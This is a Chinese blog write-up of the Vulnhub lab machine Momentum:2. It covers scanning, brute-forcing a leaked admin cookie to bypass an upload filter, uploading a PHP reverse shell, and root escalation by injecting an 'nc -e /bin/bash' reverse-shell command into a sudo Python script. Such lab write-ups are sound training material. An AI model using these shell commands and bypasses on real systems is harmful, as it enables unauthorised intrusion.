看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:2

最新推荐文章于 2024-05-28 08:30:00 发布
最新推荐文章于 2024-05-28 08:30:00 发布
阅读量823 收藏 15
点赞数 11
分类专栏: 渗透测试 # Vulnhub靶场 文章标签: 反弹shell Vulnhub靶机 python3提权 Burp爆破cookie crunch字典生成
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/132747975
版权

Vulnhub靶机Momentum:2渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:这个是Momentum系列一共有2个靶机,分别是1.2老样子需要获得root权限找到flag

Difficulty:medium

Vulnhub靶机下载:

官网下载:https://download.vulnhub.com/momentum/Momentum2.ova

Vulnhub靶机安装:

下载好了把安装包解压 然后使用Oracle VM打开即可。

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机

在这里插入图片描述
渗透机:kali IP :192.168.0.113 靶机IP :192.168.0.112

使用命令:nmap -sS -sV -A -n -p- 192.168.0.112

在这里插入图片描述
发现开启了8022端口 先访问一下80端口老样子dirsearch、dirb扫描一下后台

在这里插入图片描述
这里在使用gobuster 发现/owls/目录访问发现是上传文件的绝对路径

gobuster dir -u http://192.168.0.112/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述

②:漏洞发现:

扫描出来发现了一个/js/源码 和dashboard.html上传点

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这边先随便测试一下发现可以上传txt 但是不能传php被过滤了
这里可以通过抓包修改 返回结果为1说明上传成功

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里发现还有备份文件ajax.php.bak下载查看

在这里插入图片描述

   //The boss told me to add one more Upper Case letter at the end of the cookie
   if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){

       //[+] Add if $_POST['secure'] == 'val1d'
        $valid_ext = array("pdf","php","txt");
   }
   else{

        $valid_ext = array("txt");
   }

   // Remember success upload returns 1

大概的意思就是cookie最后以为需要爆破 ,然后需要添加cookie字段 名称为admin
且添加POST 数据 secure =valid 都满足 就能上传 pdf php txt 文件

③:文件上传漏洞利用:

首先打开bp抓包上传php-reverse-shell(改为kali监听ip)填写cookie值 和post数据值
然后发送到Intruder(爆破模块-狙击手模式)可以手动添加26个英文单词大写字母
也可以使用kali字典crunch生成字典 当回显返回为1时就是爆破结果。很显然 这里是R

crunch 1 1 -t , >> pass.txt  #生成26个大写字母

cookie: admin=&G6u@B6uDXMq&Ms

Content-Disposition: form-data; name="secure"; #复制粘贴到bp里面
val1d

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

④:反弹Shell:

然后我们再去上传成功的目录进行查看有个新的 直接 nc-lvvp 1234 监听 双击运行 回弹shell

在这里插入图片描述
在这里插入图片描述
老样子python交互 python3 -c 'import pty; pty.spawn("/bin/bash")'

然后查看权限 id whoami/home/athena 下发现了第一个flag

在这里插入图片描述

⑤:SSH登入:

然后查看密码文件Asterisk(✳得意思)通过分析可以得到账号密码为:athena/myvulnerableapp*

在这里插入图片描述
在这里插入图片描述

⑥:sudo python3提权:

sudo -l 查看有个root权限可以执行得python文件进行查看

在这里插入图片描述
来简单分析一下啥意思:定义了一个seed 然后需要输入 脚本为了回显输出,会去执行 bash 命令
我们将反弹root权限的shell命令存入seed变量执行 就可以提权为root

在这里插入图片描述

sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py #执行python文件
nc -lvvp 6666 #本地监听
;nc -e /bin/bash 192.168.0.113 6666; #输入回弹命令

在这里插入图片描述

⑦:获取FLAG:

在这里插入图片描述

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

1.信息收集arp-scan -l 获取ip地址 和端口信息 web扫描工具:nikto,dirsearch,dirb,dirbuster,whatweb,等 查看F12源码信息
2.BurpSuite爆破cookie 以及字典crunch得生成
3.sudo -l pyton3提权

Momentum系列得第2个靶机又完结啦,学习到了很多知识点又是收获满满的一天(耶耶耶!)
最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

落寞的魚丶
关注
  • 11
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 15
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
vulnhub靶场-Momentum-2打靶
最新发布
weixin_68416970的博客
05-28 1114
vulnhub靶场WP Momentum2的操作
Momentum2-靶机
薛定谔嘚喵博客
04-09 410
靶机通过信息收集发现文件上传漏洞,并找到上传点,通过Burp爆破Cookie以上传webshell,最后通过python3提权。信息收集dirsearch以及御剑目录扫描文件上传漏洞利用crunch生成小字典BurpSuite爆破cookiesudo -l查看当前的权限,发现可以使用python3提权。
渗透测试练习靶场汇总
2401_84215240的博客
05-22 1350
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //接下来我将给各位同学划分一张学习计划表!
这篇 渗透测试靶机vulnhub——DC3
热门推荐
Aluxian_的博客
03-23 1万+
Vulnhub靶机DC3渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:SQL注入:④:文件上传:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载:
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 4847
web靶场-xss-labs靶机平台的搭建和代码审计
gmailc2:一款基于Google SMTP的全无法检测的C2服务器
qq_53058639的博客
07-24 315
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
国产开源网络安全渗透测试集成靶场vulfocus
顺其自然~专栏
10-17 1448
进入项目所在的目录的vulfocus-api文件夹目录下,执行下面命令。
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Hack The Box,一款有意思的渗透测试平台
阿道夫的博客
02-03 1468
Hack TheBox是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的挑战。Hack The Box还提供了Rank机制来作为我们挑战的动力,通过通关靶场来去获取积分提高自己的排名。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)
这篇 渗透测试靶机Vulnhub——Hms?1
Aluxian_的博客
11-27 463
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagEasy (简单的)1.信息收集工具得使用2.提权命令的使用3.FTP下载、hydra爆破、SSH登入 渗透的流程思路🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
这篇 渗透测试靶机vulnhub——DC2
Aluxian_的博客
03-22 3940
Vulnhub靶机DC2渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址: ...
这篇 渗透测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2316
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!
【靶场平台】一些免费好用的靶机渗透测试环境
羊柳树的博客
11-22 1万+
1、Vulhub: (各种漏洞环境集合,一键搭建漏洞测试靶场) https://vulhub.org/(在线版) https://github.com/vulhub/vulhub(离线版) 2、Vulnhub:(国外实战靶场,适合入门提高) https://www.vulnhub.com/ 3、Vulnstack(红队实战靶场,域、横向渗透、多层网络,强烈推荐,目前共7个靶场,网上writeup齐全) http://vulnstack.qiyuanxuetang.net/vuln/# 4、WebGoat:(
靶场练习第二十二天~vulnhub靶场之Momentum-2
qq_57976347的博客
02-20 671
一、准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端口和协议:nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster,寻找隐藏的网站 gobuster dir -u http://192.168.101.114/ -x html,php,txt,php.bak,bak -w /usr/share
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 15
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值